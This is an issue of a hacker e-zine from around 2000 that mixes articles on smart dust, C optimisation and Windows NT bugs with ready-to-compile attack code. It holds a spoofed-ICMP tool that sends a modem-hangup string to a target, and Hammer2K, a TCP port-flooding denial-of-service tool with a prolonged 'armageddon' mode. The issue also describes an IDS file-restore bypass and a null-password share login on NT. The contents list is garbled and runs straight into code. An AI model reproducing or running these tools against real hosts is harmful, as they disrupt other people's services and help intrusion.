-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (9) L e g i o n s o f t h e U n d e r g r o u n d -------------------------------------------------[www.legions.org]-------------- [CONTENTS]------------------------------------------------------------[CONTENTS] [0001]=========================[Editorial - Digital Ebola ] [0010]===========================[Ode to JP Part II - KrankShaft ] [0011]========[Biometric Concepts in UNIX - Digital Ebola ] [0100]====[The Senseless Guide to Modem Commands - fejed ] [0101]============[Hole in CyberCop Monitor 2.0 NT - Proto ] [0110]==================================[Smart Dust - shekk ] [0111]====================[More Bugs In Windows NT - Ntwak0 ] [1000]===================================[Optimizing UNIX C - S ] [1001]===================================[Hammer2K - Threx #include #include #include #include #include #include #include #include #include #include #include #include #include #define VERSION "1.2-05.05" //fixed old compiler compatibility problems #define FRIEND "you" void usage( char *name ); void banner( void ); char *get_progname( char *fullname ); void done( int foo ); void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ); unsigned short in_chksum( u_short *ipbuf, int iplen ); int main( int argc, char **argv ) { struct hostent *sourceinfo, *destinfo; struct sockaddr_in sin, din; int sockfd, numpackets, i; char *target, *source; banner(); ( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL; source = argv[1]; target = argv[2]; numpackets = ( atoi( argv[3] ) ); signal( SIGINT, done ); if( ( sourceinfo = gethostbyname( source ) ) == NULL ) { printf( "cannot resolve source host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length ); sin.sin_family = AF_INET; if( ( destinfo = gethostbyname( target ) ) == NULL ) { printf( "cannot resolve destination host!\n" ); exit( -1 ); } memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr, destinfo->h_length ); din.sin_family = AF_INET; if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) { printf( "Cannot get raw socket, silly ass. You gotta be root!\n" ); exit( -1 ); } printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) ); printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) ); printf( "Number\t\t\t: %d\n", numpackets ); printf( "bleh" ); for( i = 0; i < numpackets; i++ ) gin( sockfd, sin, din ); printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1 ) ? 's' : ( char )NULL ); return 0; } void usage( char *name ) { printf( "\E[31musage: %s \n\n", name); exit( 0 ); } void banner( void ) { printf( "\nscript [ v%s ] ", VERSION ); printf( "compiled for: %s\n\n", FRIEND ); } char *get_progname( char *fullname ) { char *retval = strrchr( fullname, '/' ); return retval ? ++retval : fullname; } void done( int foo ) { puts( "Exiting...\n" ); exit( 1 ); } void gin( int port, struct sockaddr_in sin, struct sockaddr_in din ) { char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r"; char *packet; int total; struct iphdr *ip; struct icmphdr *icmp; size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr ); size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval ); int len = strlen( ginstring ); packet = ( char * )malloc( iphlen + icplen + len ); ip = ( struct iphdr * )packet; icmp = ( struct icmphdr * )( packet + iphlen ); ( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )], ( struct timezone * )NULL ); memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) ); ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen ); ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = din.sin_addr.s_addr; ip->check = in_chksum( ( u_short * )ip, iphlen ); icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) ); total = ( iphlen + icplen + timlen + len + 16 ); sendto( port, packet, total, 0, ( struct sockaddr * )&din, sizeof( struct sockaddr ) ); free( packet ); } unsigned short in_chksum( u_short *ipbuf, int iplen ) { register int nleft = iplen; register int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *ipbuf++; nleft -= 2; } if( nleft == 1 ) { *( u_char * )( &answer ) = *( u_char * )ipbuf; sum += answer; } sum = ( sum >> 16 ) + ( sum + 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); } ------------------------------------------------------------------------------- [Hole in CyberCop Monitor 2.0 NT]========================================[Proto] Lately there's been alot of hype around IDS technology and for the most part it works quite well if immplemented properly. There are basically 2 types of IDS systems out there. Host based and Network based. Both of them have their advantages and disadvantages but this article is about one particular IDS product by Network Associates called CyberCop Monitor 2.0 NT. This is a Hybrid host-based IDS product. For those of you who are unfamiliar with what IDS is, please refer back to kv-8 for a brief summary on IDS technology. One of it's features they claim is it's ability to monitor files for illegal changes and it's ablity to not only warn the admin, but it also has the ability to change it back to it's original form. This makes it a great preventative measure for web admins trying to protect their web sites from being defaced. In my testing I applied a simple rule for it to follow. I had it monitor a file I created and applied a policy for it to do 2 things upon file access. 1. Replace file to it's original form. 2. Local Pop-Up Alert on this system being attacked. The product works great except under one condition that I found so far for wich I was shocked to find. It's nothing fancy like exploiting a particular DLL to up-load the changed file, no, it's quite simpilar then that. Believe it or not, to over come this feature, all you have to do is FTP the modified file to the system with CyberCop Monitor and although it will warn you of the modifierd file, it cannot automatically replace the file back to it's original form. The folks over at NAI have been informed and I was assured that they are working on a solution to the problem but at the time of this publication the hole within their product still exists. [Smart Dust]=============================================================[shekk] Technology is a to a point where it is thought possible(and almost done) that we can have a completely independent node inside of 1 cubic mm. These "dust motes" will include power supply, circuits, communication, and sensors. The possibilities this could bring are endless, from spying to gathering weather data, dust motes will be able to communicate with a bi-directional radio or lasers. Protocols and systems for these dustmotes to communicate with a laser network are being designed to implement a way for dust motes to talk to each other. Even the top notch radio hardware that we have in todays robust radio industry, still uses up a lot of power. Because of this, they have decided to use a laser network for most communication utilizing lasers much smaller then the laser pointers you might have seen for around 10 dollars. This means, even if one mote is not sensing very much data, they could work together in say a room, and collect their data together. Right now, macro motes have been created as large scale models of the smart dust of the future. Most of them are about 1 inch long. They can have sensors for humidity, barometric pressure, tilt, vibration, magnetic fields, and light. Macro motes include a bi-directional radio, microprocessor, and a battery which will let them live about a week, and then for another 2 years with a 1% duty cycle. Other accomplishments include a 21 km range with laser, which i will talk about in more detail later. Now here is a list of the current macro motes that have been designed and tested, these are all giants compared to what dust motes are expected to be in 2001. [List of Macro Motes with features] - RF mote { RF 916.5MHz, 5k bps with 20 meter range. Sensors - 2 axis magnetometers, 2 axis accelerometers, light, tempereature, pressure } Laser mote { Long range laser transmission of data from sensors, many kilometers in range. This is one of the motes that was used to show the range of laser transmission in the experiment to transmit weather data. Sensors - temperature, light, pressure, humidity. } CCR mote { Corner cube reflector/light reciever communication range depends on laser. This is the technology that will hopefully be implemented in the smart dust of the future for communication with each other. Sensors - temperature } Mini mote { This is a miniature version of the RF mote. RF 916.5MHz with a 10kbps 20 meter range. Sensors - temperature MALT } This has steerable laser beam communication with a CCD camera. Sensors - light } weC { This is the enxt version of the mini mote, it can be reprogrammed wirelessly, has RF 916.5MHz with a 10kbps 20 meter range. Sensors - light, temperature. } IrDA mote { these can communicate with any infared device, such as the palm pilot. Sensors - temperature } Laser communication. Using an optical reciever with the CCD camera, connected to a laptop, these lasers can get analog data from any of the sensors and send it digitally to the laptop. This procedure can simultaneously recieve data from about 20 nodes using CRC error correction for accurate reception. As of now, this communication is very slow, when they were sending the weather data, they were getting about 8 bits a second. experiment - They stripped off the bi-directional radio and connected a laser pointer up to a weather sensing node, and had CCD camera capturing frames to a laptop. 21 km away they could send data with these lasers(using something to make the spot bigger). This means not only do the lasers take up less power, but they also have a much larger range then what could be imagined when it comes to broadcasting radio waves out of a cube millimeter machine. They have already designed and fabricated sub mm scale mirrors with 2 motors all on the same chip, which will be used for aiming the laser beams. Tests have also been conducted and found out that these tiny lasers can transmit millions of photons per second. There are light detectors that can detect 1 single photon(a photon is like one packet of light, read brief history of time by stephen hawking). They believe that these little boogers will be able to communicate with low earth orbit satalites, which gives us even more possibilities. HOW SO SMALL? There is something called IC fabrication. It allows you have a scale of say 1cm long, and then image it down to the sub-millimeter scale. This is how they are carving sub-millimeter sized circuits. Here is a link to a nice picture of what a dust motes structure will be. http://robotics.eecs.berkeley.edu/~pister/SmartDust/figures/colormote.gif Some accomplishments with this fabrication technique include synthetic maple seeds, where they used a honeycombed piece of silicon .1mm thick and carved out a wing, then putting a tiny piece of silicon on the bottom where it would auto rotate as it fell. In 2001, they should have dust motes the size of dust, small enough where they can be suspended in air just like dust, small enough to where noone would notice. Little motors have already been thought of, so these motes could also be controlled around. POSSIBILITIES These little bitches could fall in the wrong hands, and we could have a real life version of the book 1984, where the government watches us alday long and commands us to do things over speakers on a dust motes back. Or like screamers where the robots takeover and end up killing people, but i wouldnt worry too much about that, you and your desktop are smarter than dust motes ;) Holding back from thinking what could go wrong with advanced technology like this, there could be some very neat applications for these. You could have these monitoring things, from your goods you are shipping, or use these as controls on your fingertips with the accelometers, for computers, or even games. Virtual Reality that knows your exact motions. Now, here are credits to the designers of smart dust, who not only are designing these neat little creatures at the University of California, but are putting up information on leeto websites for people like me to find and enjoy reading. Without these guys web page teqneeqs, none of this information would be coming to you right now. Bryan Atwood Colby Bellew Lance Doherty Seth Hollar Matt Last Brian Leibowitz Wei Mao Lilac Muller Junichi Nishimoto Dana Teasdale Brett Warneke Xiaoming Zhu - thank you expecially for replying to my emails. my plugs - shouts to all of gH, LoU, and a special shout to ging3r www.pure-security.net www.elucks.org www.hack.co.za [More Bugs In Windows NT]===============================================[Ntwak0] Subject: Password problem In NT when connecting to a share, should I say you do not need a password in some cases even if it is protected I mean :) Monday, December 27, 1999 by NtWaK0 Tested on NT 4.0 +SP6 + SP6a. I will try to do it by example in this case you will be able to repeat it --> I am going to map a network share call it X: E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0 The command completed successfully. --> I done net view to see the shared resources E:\Tmp>net view \\1.1.1.1 Shared resources at \\1.1.1.1 Share name Type Used as Comment -------------------------------------------------------------------------------- Tmp Disk X: The command completed successfully. --> Now I copyed a file to X: to use the 1.1.1.1 resources. E:\Tmp>copy test.txt x: 1 file(s) copied. --> Now I delete the connection I created to 1.1.1.1 using X: E:\Tmp>net use /delete x: x: was deleted successfully. --> Now I tryed to recreate the connection using NULL password just for fun i w as doing this E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 System error 1326 has occurred. Logon failure: unknown user name or bad password. E:\Tmp> --> It is normal I could not login now I done The Bug: --> Now Reconnect using the command line E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0 The command completed successfully. --> I used Explorer to copy the same file test.txt from my drive E:\tmp to the mapped drive X: --> I got a msg saying "The file already exist do you wana overwrite it?" I said yes, well it is normal I did copy it before as you saw in the step above . --> After copying the file in explorer I did right click on X: (the mapped drive) and disconnect --> I got a msg box saying "There are currently files open on X: (connected to \\1.1.1.1\tmp). If you do close the files before disconnecting from the network, data may be lost. Do you want to disconnect the device anyway?" Then I clicked Yes in this case I have no more connection mapped to X: In this case I should not be able to connect without password or username but not true ;) --> Next I do not know what I tried it I guess for fun In DOS window I typed E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 The command completed successfully. --> W00t I was able to login I did not believe hehe with no password. --> To make sure i was not dreaming or missing sleep, I was able to repeat it like 10 times. But if you do connect and disconnect using net use /delete x: this will work and you cannot connect with no password like the explore case. So you this is a security bug that you can reproduce it in explore and DOS command and it has to follow certain steps . What do I mean by that ? well you have to disconnect using explore and when you get the msg saying : "There are currently files open on X:(connected to \\1.1.1.1\tmp) blah blah... In that case if you disconnect and reconnect right after using no password that should work. ;) But if you do it all from the command line this should not work and that is normal. Here is an example done all by command line: E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0 The command completed successfully. E:\Tmp>copy test.txt x:test.txt 1 file(s) copied. E:\Tmp>net use /delete x: x: was deleted successfully. E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0 System error 1326 has occurred. Logon failure: unknown user name or bad password. E:\Tmp> Cheers, |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-| The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-| Live Well Do Good --:) ================================================================================ Subject: IE5 and The Cool Return Download and Installation Successful Friday, December 03, 1999 It was late about 3 am and a lot of coffee in my blood, so i decided to do some IE5 Active update to relax from what I was working on. :) So i clicked IE5, clicked http://windowsupdate.microsoft.com/default.htm?Page=productupdates --> Got a nice Windows :) Please Wait... Windows Update is customizing the product updates catalog for your computer. This is done without sending any information to Microsoft --> IE5 come up with (Main windows) Windows NT 4.0 Service Pack 5 (128 bit strong encryption) 456 KB/ Download Time: < 1 min Windows NT 4.0 Service Pack 5 includes the most recent updates and enhancements to Windows NT Server 4.0 and Windows NT Workstation 4.0. Service Pack releases are cumulative, so Service Pack 5 contains all previous Service Pack fixes and any new fixes created after Service Pack 4. Note that the actual download will be anywhere from 11-32Mb depending on the actual files on your current machine. This release features 128 bit strong encryption and can only be downloaded within the United States and Canada --> I clicked to check Windows NT 4.0 Service Pack 5 (128 bit strong encryption) --> I clicked on the Download (blue) button to start download Product Updates Download Checklist 1 Confirm Selections You have chosen to install the following software. You can deselect any of the components you do not want to install by clearing the check box. Total Size: 456 KB Download Time: < 1 min Windows NT 4.0 Service Pack 5 (128 bit strong encryption) 456 KB/ Download Time : < 1 min 2 View Instructions? View a single, combined instruction page for all of the software you have chosen to install. You may want to print these instructions for later reference. View Instructions 3 Start Download Download and install the software shown above. --> I clicked Start Download --> I got another windows SUPPLEMENTAL END USER LICENSE AGREEMENT FOR MICROSOFT SOFTWARE IMPORTANT: READ C AREFULLY - --> I clicked YES After downloading the file, I got another HAHAHA nice Service Pack Setup Error ( Modal Window) "The version of Windows NT you have installed is more current than the update you are trying to install" WITH THE OK button --> I clicked OK --> I got Product Updates Download and Installation Successful SUCCESSFUL The following software was successfully downloaded and installed. Windows NT 4.0 Service Pack 5 (128 bit strong encryption) HAHA now let me tell you what i see wrong in that HAHA now let me tell you what i see wrong in that 1- The updates did not install So i should not be getting "Download and Installation Successful SUCCESSFUL" 2- Why the script did not detect that i have SP6 when it started ? bah... they should be checking first, and when they find that I have Sp6, they should not propose the option of getting the patch "Windows NT 4.0 Service Pack 5 (128 bit strong encryption)" I did not try this on win9x, or other IE. Cheers, +-------------oOo-(NtWaK0)(Telco. Eng. MCSE.Etc..)-oOo-------------+ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. +--oOo-"---------------------------------------------------"-oOo---+ Live Well Do Good --:) ================================================================================ Subject: PGP 6.5.2 for Windows will change some security setting if you re-install it Tuesday, December 07, 1999 Tested on NT 4.0 + SP6 + IE5.01 Today I had a funny problem with PGP 6.5.2. I was working and decided to wipe out some files. --> I selected the files to wipe out --> Right click on the selected files, and Clicked PGP then Clicked Wipe --> Hmm funny the PGP Wipe dialog box come up but EMPTY. --> I thought i am to much backed ;) but I done it again and selected others files in the same directory --> Hmm funny the PGP Wipe dialog box come up but EMPTY. --> Well I decide to re-install PGP 6.5.2 --> After the install I still cannot wipe the files. --> I continued working and wiped the files using the PGP tool menu , heh that works --> After some time I decide to find out how come that sh** is not working. --> After some time I decide to find out how come that sh** is not working. --> So i selected on file form the same directory as before, and right click the file then properties --> Hmm the file is READ Only so I check that OFF --> Right click on the selected files, and Clicked PGP then Clicked Wipe --> It worked, ;) I was able to wipe the file. So when the file is read only PGP do not display that in the wipe Dialog box. Now after I re-installed PGP hehe for nothing, I opened my e-mail outlook 2000 and send some e-mails. Hrmm when i clicked the SEND button I noticed something funny, I SIGN all my e-mail and when I clicked the SEND I did not get the SIGN dialog box to type in my pass phrase so I said heh PGP changed my settings. So from outlook 2000 Menu I clicked PGP then Option then E-mail TAB and under e-mail options SIGN New messages by default was UNCHECKED. And I am like 100 % sure I had it checked before. I consider is the security issue and here is why ? : Imagine you done that re-installed PGP and you had your settings to sign all your mail by default, and after you re-installed you SENT THE MOST LEGAL ELITE Mail and you clicked SEND and you did not realize that the mail was not signed. So one day you need that mail as proof, but you opened the mail and you was lik e 100 % sure it was signed by you, but you could not find the signature ;) I am sure situations like this will get you mad. ? [Optimizing UNIX C]==========================================================[S] Possessing UNIX C optimization skill can be prove to be useful in many situations. An enumaration of such instances follows: - Resource intensive projects - Writing code to be executed on a slow processor - Interactive web sites for use by the masses - Obsession with elegance This abridged document is by no means a definitive reference; it is only an introduction. The "Resources" section appended to this document contains other quality sources. My personal interest in C optimization began as the result of this proprietary programming endeavor: http://www.freezersearch.com/index.cfm?aff=dhc Buffering I/O ------------- Minimizing I/O can improve code performance significantly, especially when dealing with disks. Buffering I/O will reduce a disk's workload and the number of system calls that need to be executed. Take the following pseudo-code that reads 1024 bytes, for example: while(cnt<1024){ ... read(fd,&c,1); ... } read(fd,&buf,1024); In the first model, 1,024 system calls have to be made and a seperate disk operation has to be made for each one of those. In other words, the hard drive platters have to spin to the requested position of the file on disk for each individual read() call. Here's a real-world example of buffering efficency: [super@ufo super]$ perl -e 'print "A"x65535;' > /tmp/test [super@ufo super]$ cat prog1.c #include #include int main(void){ int fd; unsigned char c; register unsigned short cnt; if((fd=open("/tmp/test",O_RDONLY))<0){ exit(EXIT_FAILURE); } cnt=0; for(cnt=0;cnt<65535;cnt++){ read(fd,&c,1); } exit(EXIT_SUCCESS); } } [super@ufo super]$ cc -o prog1 prog1.c [super@ufo super]$ cat prog2.c #include #include int main(void){ int fd; unsigned char c; char buf[65535]; if((fd=open("/tmp/test",O_RDONLY))<0){ exit(EXIT_FAILURE); } read(fd,&buf,65535); exit(EXIT_SUCCESS); } [super@ufo super]$ cc -o prog2 prog2.c [super@ufo super]$ time ./prog1 0.06user 0.05system 0:00.10elapsed 108%CPU (0avgtext+0avgdata 0maxresident)k 0inputs+0outputs (75major+9minor)pagefaults 0swaps [super@ufo super]$ time ./prog2 0.00user 0.00system 0:00.00elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k 0inputs+0outputs (75major+24minor)pagefaults 0swaps Buffer efficiency is noticable even at 448.92 BogoMIPS. Obviously, prog1 is frivolously wasting resources. Although prog2 has to allocate memory for the character array, this is a fair trade for extraneous disk activity and wasted CPU cycles. Most buffers will have a short lifespan and may be freed rather quickly. Thus, the used memory will have little or no effect on operation. Be careful when utilizing this technique. If any of the memory space of the allocated buffer is swapping, this method's purpose has been defeated. Why read from the disk when an immediate write of identical data is pending? In short, don't use excessively large buffers. Loop unrolling -------------- Loop unrolling is the expansion of consolidated recurring code. A decent amount of processing can be eradicated by spreading out loop code. Loop unrolling cut back on incremental math, memory used by integers for counting, and ASM instructions that handle recursion (JMP, JBE, etc.) /* Hence, */ while(cnt<1000){ puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); puts("Hello World"); cnt+=10; } /* is superior to */ while(cnt<1000){ puts("Hello World"); cnt++; } Lazy programmers may use the -funroll-loops option of egcs. Bitfields --------- Often, a coder may need to set an on/off flag for use in a conditional statement. The disturbing part is that most coders declare an integer with which to do this. How stupid. How lame. How wasteful. This has already been done with base 2 (binary). Instead of allocating the sizeof(int), usually four bytes (32 bits), perform the operation with a single bit. This can be accomplished using structures. struct bitfields { int flag1 : 1; } The preceding structure decleration tells the compiler to set aside one bit for the flag1 variable. This syntax may also be applied when declaring an integer with a known value limit. For example, a variable used for counting that never exceeds 15 would only need a nibble to do its job. Therefore, it may be declared within a structure as so: "int flag : 4;". Anyone with bits and bytes mentality knows that a nibble is half a byte. On most architectures, a byte is 8 bits so a nibble is 4 bits. Only 4 bits are needed to count to fifteen because of binary fundamentals: 1 + 2 + 4 + 8 = 15. LWPs ---- Lightweight processes, otherwise known as threads, can make use of the wasted time that a program spends blocking, or sitting idle while waiting for a certain event. Additionally, threads can extinguish the overhead of creating a new, "heavyweight" process. Lightweight processes share memory space with the main process, consequently throwing IPC (Inter-Process Communication) out the window. Hence, the Linux move towards clone(). Optimization through debugging ------------------------------ Examining the output of programs such as strace, ltrace, ktrace, and truss can aid in the discovery of superflous system and library calls, ASM commands, etc. In general, the less output generated by a tracing debugger, the more efficient the code. Ramdisks -------- A ramdisk, as the name implies, is a filesystem in RAM. Ramdisks have a multitude of optimization applications; the implementation of a speedy cache system and minimizing the cost of dynamic configuration files, to name a few. Any sensible computer user knows that reading from RAM is remarkably faster than reading from disk. Summaraziation of ramdisk usage will not be provided. Other documents fully address this subject. Registers --------- Variables with frequent usage should be declared with the register keyword; examples are loop counters and character pointers used for intricate lexical analyzation. A classic case is illustrated in the "Buffering I/O" section above. This rule of thumb should be known by programmers even with a rather small amount of experience with C. Resources --------- FTP: ftp.debian.org /debian/dists/unstable/main/source/utils/ltrace_* FTP: scitsc.wlv.ac.uk /pub/cprog/prog.course.wlv./chapter.12 WWW: http://rpmfind.net/linux/RPM/Development_Debuggers.html WWW: http://centaurus.cs.umass.edu/~wagner/threads_html/tutorial.htm WWW: http://www.abarnett.demon.co.uk/tutorial.html USENET: comp.lang.c, comp.programming.threads Manual pages: ltrace(1), strace(1), ktrace(1), truss(1) [Hammer2K]===============================================================[Threx] /* Hammer2K ver 1.0 BETA by Threx (threx@attrition.org) I'm new to socket programming... So bare with me. Hammer2K is a simple DoS attack tool that will kill a port by rapidly opening a port and sending a burst of data. It affects major ports such as telnet, finger, and smtp. Because inetd checks the status of these ports, it will restart in 10 minutes. So, I have armageddon mode that will keep killing it for an hour. Problems: If the victim has more bandwidth, it can't be killed. You can have a group of people to take it out, but I haven't tested that theory. Coming Up: Hammer2K will soon be a DDoS attack tool. Hopefully more ports will be found that are affected. Compile: gcc hammer2k.c -o hammer2k Greets: #svun on undernet, LoU, APHC */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char *msg = "123456789123456789123456789123456789123456789123456789"; int sock; int X; int p; int l; int len; int a; int Usage(char *ARG); int tcp(void); int armageddon(void); struct hostent *he; struct sockaddr_in target; int main(int argc, char *argv[]) { if (argc < 4) { Usage(argv[0]); } if ((he=gethostbyname(argv[1])) == NULL) { printf("\n ERROR: hostname lookup failed \n"); exit(1); } if (strcmp(argv[2], "-telnet")==0) { p = 23; l = 1800; } else if (strcmp(argv[2], "-pop2")==0) { p = 109; l = 3000; } else if (strcmp(argv[2], "-imap2")==0) { p = 143; l = 4000; } else if (strcmp(argv[2], "-finger")==0) { p = 79; l = 1400; } else if (strcmp(argv[2], "-smtp")==0) { p = 25; l = 740; } else if (strcmp(argv[2], "-ftp")==0) { p = 21; l = 800; } else if (strcmp(argv[2], "-pop3")==0) { p = 110; l = 1350; } else if (strcmp(argv[2], "-netstat")==0) { p = 15; l = 1300; } else { printf("\n ERROR: Hammer2K doesn't support that service. \n"); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { printf("\n ERROR: fatal connection error \n"); exit(1); } a = atoi(argv[3]); if (strcmp(argv[3], "-A")==0) { armageddon(); } else if (strcmp(argv[3], "-NA")==0){ tcp(); } else { printf("\n ERROR: please use -A (Armageddon ON) or -NA (Armageddon off) \n"); } } int Usage(char *ARG) { printf("\n\n Hammer2K by Threx "); printf("\n Usage: hammer2k "); printf("\n :::: "); printf("\n 0.0.0.0 "); printf("\n target.net "); printf("\n\n :::: "); printf("\n -netstat "); printf("\n -ftp "); printf("\n -telnet "); printf("\n -smtp "); printf("\n -finger "); printf("\n -pop2 "); printf("\n -imap2 "); printf("\n -pop3 "); printf("\n\n :::: "); printf("\n -NA = Armageddon Mode Off"); printf("\n -A = Armageddon Mode On\n\n"); exit(1); } int armageddon(void) { int loop; int number; loop = 10; printf("\n\nHammer2K by Threx "); printf("\nHomepage http://inferno.tusculum.edu/~threx"); printf("\nArmageddon Mode is [ON] (This will kill a port for one hour)\n"); printf("\n\nFlooding port......\n\n"); for(number = 1; number < loop; number++) { for(X = 1; X < l; X++) { if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { goto timer; } if ((send(sock, msg, len, 0)) == -1) { printf("\n ERROR: fatal send error \n"); exit(1); } len = strlen(msg); send(sock, msg, len, 0); close(sock); } timer: system("sleep 600"); } printf("\n Port %d has been killed for one hour. \n\n", p); close(sock); return 0; } int tcp(void) { printf("\n\nHammer2K by Threx "); printf("\nHomepage http://inferno.tusculum.edu/~threx"); printf("\nArmageddon Mode is [OFF]]\n"); printf("\n\nFlooding port......\n\n"); for(X = 1; X < l; X++) { if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n ERROR: fatal socket error \n"); exit(1); } target.sin_family = AF_INET; target.sin_port = htons(p); target.sin_addr = *((struct in_addr *)he->h_addr); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) { printf("\n Port %d: Killed \n", p); exit(1); } if ((send(sock, msg, len, 0)) == -1) { printf("\n ERROR: fatal send error \n"); exit(1); } len = strlen(msg); send(sock, msg, len, 0); close(sock); } printf("\n Port %d: Port assumed to be open. \n\n", p); close(sock); return 0; } [Hax0ring the Slurpee]===============================================[Phriction] ITEMS NEEDED: At least $.79 and a local 7-11 Slurpee's are God's gift to man and no they were not invented by the indian people Abdul and his friends didn't event slurpee's once when a long time ago something I like to dream about now and then, 7-11's were run by english speaking folk, yes you may not believe me but it is true. Now $.79 for enjoyment that will last the whole day? I mean thats better than someone making their root passwd root.... well almost. But now onto the gritty stuff most people think slurpee's are easy to make they think they get the most for their $.79 or at most $1.19 for the 40oz. but they don't yes good old Abdul and his friends ripped you off you think they would put instructions on how to make one on the machine but no they don't want you to know these secrets. Yes I have been banned from many 7-11's for finding out these secrets and also for such antics as "wheezing the juice", so friend I want you not to take this file lightly. I think the toughest part to is choosing your flavors, if you only put one or two flavors in your slurpee you don't deserve to live, a slurpee was made for mixing many flavors one of my favorites is Kiwi Strawberry, now remeber always put your favorite flavor second for optimal taste put your least favorite last on top, second favorite first third favorite third and anything after that just goes up in acsending order. Next the lid you shouldn't put your last flavor in till you have placed the lid on, then fill it up to the top(NOTE TO READER: I usually like to sample flavors after i add them stating in a loud voice mmmmm that was good, or ahh that one is just ok and if they are ringing up another customer feel free to wheeze the juice(wheezing the juice is placing your open mouth under the slurpee dispenser while unloading as much slurpee down your throat as you can fit very fun but painful brain freezes)) now most people think that after this they are down and thats what Abdul wants you to think but you are wrong trapped inside the layers of slurpee is air, proceed to stir the middle and watch as magically your slurpee cup has more room WOW, REALLY? Yes really then goto the counter and smile big as you gladly hand Abdul your money. Another cool trick if Abdul has another customer get one of those big 64 oz. pop cups fill it up and pay the price of $.99 for a 64 oz. slurpee or if your not feeling lucky add a little pop on top abdul will never know. WARNING: Repeatedly wheezing the juice on the same visit can be harmful to^M your health. [Spam]=============================================================[The Readers] Date: Sat, 20 May 2000 14:37:06 -0400 (EDT) From: Jessica McAllister To: digiebola@hackphreak.org Subject: sure i'm from colorado and where might you be from? /* h0h0h0h0 */ Date: Sat, 27 May 2000 07:23:18 -0400 (EDT) From: Algerian Hacker To: digiebola@hackphreak.org, truedog@legions.org, lothos@rootfest.org Cc: thegnome@nmrc.org Subject: Pleas Help Hello, I am an Algerian Hacker, please tell me how to hack or Crack a protected directori in a server or can you hack it and give the password & username or the file, thanks Algerian Hacker dzhack@mail.com /* No, we will not hack things for you. You should really be more specific, bad English aside, `directori in a server` could mean almost anything. */ Date: Mon, 5 Jun 2000 14:40:42 -0700 (PDT) From: x-empt@ispep.cx To: Rumy Mirza Cc: digiebola@hackphreak.org, deth@errata.net, truedog@legions.org, fejed@legions.org, lothos@rootfest.org, shadows@legions.org, x-empt@ispep.cx Subject: Re: hack ISP Hi Rumy, What you seek is the "Land of Scripts and Childish Fun" also known as "Script-Kiddie Land". I went there once to explore, but quickly found out that the rollar coasters were made of tinfoil and if I were to ride one, I would quickly fall to the theme park below Script-Kiddie Land, known as Big Brother Land. Big Brother will catch you and break your fall, but then he will do some anal probes and see if you are the right type of person for his Area 51 program. (See attachded) If you are made of the right stuff, then you will probably get to travel to distant galaxies and visit planets with little E.T.-like creatures running around, but if you fail Big Brother's test, you are sent to Hell, also known as prison to the American public. (See attached) In Hell you receive deluxe accomodations for eternal anal probing action. You must chose your path wisely my son. x-empt On Tue, 6 Jun 2000, Rumy Mirza wrote: > Hi , > I want a programe / method by which i could get usernames and passwords from my ISP (internet service provider). In short I want free internet connections. >will be greatful if you would help me out > Thank You > Rumy Mirza > > reply to : rumymirza@hotmail.com > > /* heeeh. */ ---------- Forwarded message 